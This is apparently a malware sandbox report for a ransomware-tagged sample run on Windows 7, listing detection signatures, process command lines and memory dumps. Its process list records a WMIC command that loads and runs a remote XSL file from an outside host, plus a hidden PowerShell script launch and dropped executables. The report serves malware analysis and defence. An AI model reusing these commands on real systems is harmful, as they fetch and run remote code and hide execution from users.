Overview

overview

10

task1

 

10

task2

 

10

task3

 

10

task4

 

10

task5

 

8

task6

 

8

task7

 

10

task8

 

10

task9

 

10

task10

 

10

Analysis

  • max time kernel
    122s
  • max time network
    126s
  • resource
    win7v191014

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Supergevaarlijkk.zip

  • Sample

    191029-p1j1431a9n

  • SHA256

    6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score
N/A

Malware Config

Signatures

  • Uses Volume Shadow Copy Service COM API 1 IoCs
    ransomware
  • Drops startup file 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Drops file in system dir 23 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Loads dropped DLL 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
    persistence
  • Uses Volume Shadow Copy WMI provider 1 IoCs
    ransomware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
    ransomware
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Executes dropped EXE 3 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Discovering connected drives
    PID:1232
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:1060
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding B634A551DF859F86E9240F3227158634
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1972
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1364
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-15615658111133415321640779294-713463533-2759988842134842951-1197704532-314222821"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1344
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding 0E7631CBA027D971C91749B234541526
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    PID:1912
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    1⤵
    • Uses Volume Shadow Copy Service COM API
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Uses Task Scheduler COM API
    • Uses Volume Shadow Copy WMI provider
    PID:1192
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "18774686867520453695705469911966248280143184437110595509861908542373-1764949845"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2068
  • C:\Users\Admin\AppData\Local\Temp\lc8EF5.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc8EF5.tmp"
    1⤵
    • Executes dropped EXE
    PID:2160
  • C:\Users\Admin\AppData\Roaming\poMNJa\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\poMNJa\nvsmartmaxapp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2404
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    PID:2424
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {131BEACE-730A-44CC-B203-4B546B87E23F} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2764
  • C:\Users\Admin\AppData\Roaming\poMNJa\gup.exe
    C:\Users\Admin\AppData\Roaming\poMNJa\gup.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2796
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    1⤵
    • Loads dropped DLL
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1060-15-0x0000000002090000-0x0000000002094000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-12-0x0000000001300000-0x0000000001304000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-11-0x0000000001680000-0x0000000001684000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-13-0x0000000002090000-0x0000000002094000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1192-20-0x000000001C230000-0x000000001C234000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1192-19-0x000000001C230000-0x000000001C234000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1232-0-0x00000000040D0000-0x00000000040D4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1232-17-0x0000000002240000-0x0000000002244000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1232-16-0x00000000040D0000-0x00000000040D4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2424-27-0x0000000003290000-0x00000000032A1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2424-28-0x00000000036A0000-0x00000000036B1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2424-24-0x00000000000C0000-0x00000000000C1000-memory.dmp

    Filesize

    4KB

    Download